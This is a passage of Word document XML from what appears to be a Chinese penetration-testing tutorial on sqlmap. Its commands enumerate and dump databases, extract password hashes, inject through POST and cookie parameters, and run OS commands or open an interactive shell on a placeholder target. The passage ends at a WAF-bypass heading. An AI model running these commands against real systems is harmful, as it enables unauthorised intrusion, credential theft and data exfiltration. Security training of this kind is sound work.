    <w:p w:rsidR="001B1F66" w:rsidRDefault="009619F0" w:rsidP="001B1F66">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="1050"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc489789701"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关注入工具使用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w:rsidR="0085550B" w:rsidRPr="009E78EF" w:rsidRDefault="00607492" w:rsidP="00B14E5D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只讲</w:t>
      </w:r>
      <w:r w:rsidR="0085550B"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有名的软件，不讲那些简单的软件，以后可以找个时间一下讲完这些简单软件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0085550B" w:rsidRDefault="0085550B" w:rsidP="0085550B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00403CFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="006E7880">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00514A7F">
        <w:t>一般注入流程：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00F648F9">
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap -u "www.ONDragon.com/ONDragon?id=1" --dbs</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>查看所有数据库</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">sqlmap -u "www.ONDragon.com/ONDragon?id=1" --current-db </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>查看当前数据库</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">sqlmap -u "www.ONDragon.com/ONDragon?id=1" --user       </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>查看数据库用户名</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:br/>
        <w:t xml:space="preserve">sqlmap -u "www.ONDragon.com/ONDragon?id=1" --current-user  </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>查看当前用户名</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">sqlmap -u "www.ONDragon.com/ONDragon?id=1" --is-dba     </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>判断权限</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">sqlmap -u "www.ONDragon.com/ONDragon?id=1" –privileges  </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>判断权限</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">sqlmap -u "www.ONDragon.com/ONDragon?id=1" --passwords  </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>枚举密码哈希</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">sqlmap -u "www.ONDragon.com/ONDragon?id=1" --tables -D database'name    </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:lastRenderedPageBreak/>
        <w:t>获取数据库的表名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">sqlmap -u "www.ONDragon.com/ONDragon?id=1" -D database'name -T table'name --columns   </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>获取数据库对应表的字段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">sqlmap -u "www.ONDragon.com/ONDragon?id=1" -D database'name -T table'name -C column'name --dump  </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>获取数据库对应表的字段的值</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">   --dump-all  </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>获取所有内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00CA13C3">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00514A7F">
        <w:t>-u (get</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>型注入</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap -u "www.ONDragon.com/?ONDragon=1"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00CA13C3">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00514A7F">
        <w:t>--data (post</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>型注入</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap -u "www.ONDragon.com/ONDragon" --data="user=admin&amp;pass=pass"</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:br/>
        <w:t xml:space="preserve">sqlmap -r  requests.txt    </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>读取</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>包进行自动</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>post</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>注入（也可以进去</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>头部的任意地方注入，只要在注入地方加入</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>即可）</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:br/>
        <w:t>sqlmap "www.ONDragon.com" --forms</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00366F87">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00514A7F">
        <w:t>--coockie (cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>注入</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">sqlmap -u "www.ONDragon.com/ONDragon" --cookie="user=admin&amp;pass=pass" --level 2  (level </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>大于</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>就行</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00231AA7">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00514A7F">
        <w:lastRenderedPageBreak/>
        <w:t>--batch (</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>自动选择</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>默认选项</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00004EF8">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00514A7F">
        <w:t>-p  (</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>参数选择</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap -u "www.ONDragon.com" --forms -p admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="004E07FE">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00514A7F">
        <w:t>1.ACCESS</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>数据库：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap.py -u “url” /*-u</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>为常规扫描参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap.py -u “url” –tables /*–tables</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>拆数据库表</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap.py -u “url” –columns -T “</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>要拆的表名</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>”/*</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>列出指定表名</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap.py -u “url” –dump -T “</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>要拆的表名</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>”-C “</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>要拆的字段名</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>” /*–dump</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>为拆解字段名会保存在</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap/output</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>目录下</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="004044CD">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00514A7F">
        <w:t>2.MYSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>数据库：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap.py -u “url” /*</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>扫描注入点</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap.py -u “url” –dbs /*</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>列出所有数据库</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap.py -u “url” –current-db /*</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>列出当前数据库</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap.py -u “url” –current-user /*</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>列出当前用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap.py -u “url” –tables -D “</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>当前数据库名</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>” /*</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>拆解当前数据库表</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap.py -u “url” –columns -T “</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>要拆得的表名</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>” -D “</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>当前数据库名</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>” /*</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>拆解指定表字段名</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap.py -u “url” –dump -C “</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>字段名</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>” -T “</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>表名</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>” -D “</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>当前数据库</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="006F24AC">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00514A7F">
        <w:lastRenderedPageBreak/>
        <w:t>3.SQLSERVER</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>数据库：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap.py -u “url” /*</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>扫描注入点</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap.py -u “url” –dbs /*</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>列出所有数据库</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap.py -u “url” –current-db /*</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>列出当前数据库</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap.py -u “url” –current-user /*</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>列出当前用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap.py -u “url” –tables -D “</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>当前数据库名</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>” /*</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>拆解当前数据库表</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap.py -u “url” –columns -T “</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>要拆得的表名</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>” -D “</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>当前数据库名</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>” /*</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>拆解指定表字段名</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap.py -u “url” –dump -C “</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>字段名</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>” -T “</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>表名</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>” -D “</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>当前数据库</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>SQLSERVER</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>操作和</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>MYSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>是一样的！！！常见的几种数据库！！！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00963C26">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00514A7F">
        <w:t>4.COOKIE</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>注入：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap.py -u “www.xxx.com/asp</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>www.xxx.com/php” –cookie “</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>参数名如</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>id=1” –level 2/*level</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>为提升权限</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>什么数据库就按照上面的数据库加上</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>语句拆解就行了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00793C22">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00514A7F">
        <w:t>5.POST</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>注入：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>抓包保存到</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>SQLMAP</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>目录下</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>的文件然后输入指令</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap.py -r xxx.txt /*xxx.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>为保存包文件的文件名</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap.py -u “url” –data “POST</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00F97F7F">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00514A7F">
        <w:lastRenderedPageBreak/>
        <w:t>6.</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>命令：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap.py -u “url” –os-cmd=”net user” /*</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>net user</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap.py -u “url” –os-shell /*</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>系统交互的</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>shell*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="008832CF">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00514A7F">
        <w:t>7.</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>注入</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>请求</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap.py -r xxx.txt –dbs /*xxx.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>内容为</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>请求</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00EC0246">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00514A7F">
        <w:t>8.</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>绕过</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>WAF</w:t>
      </w:r>
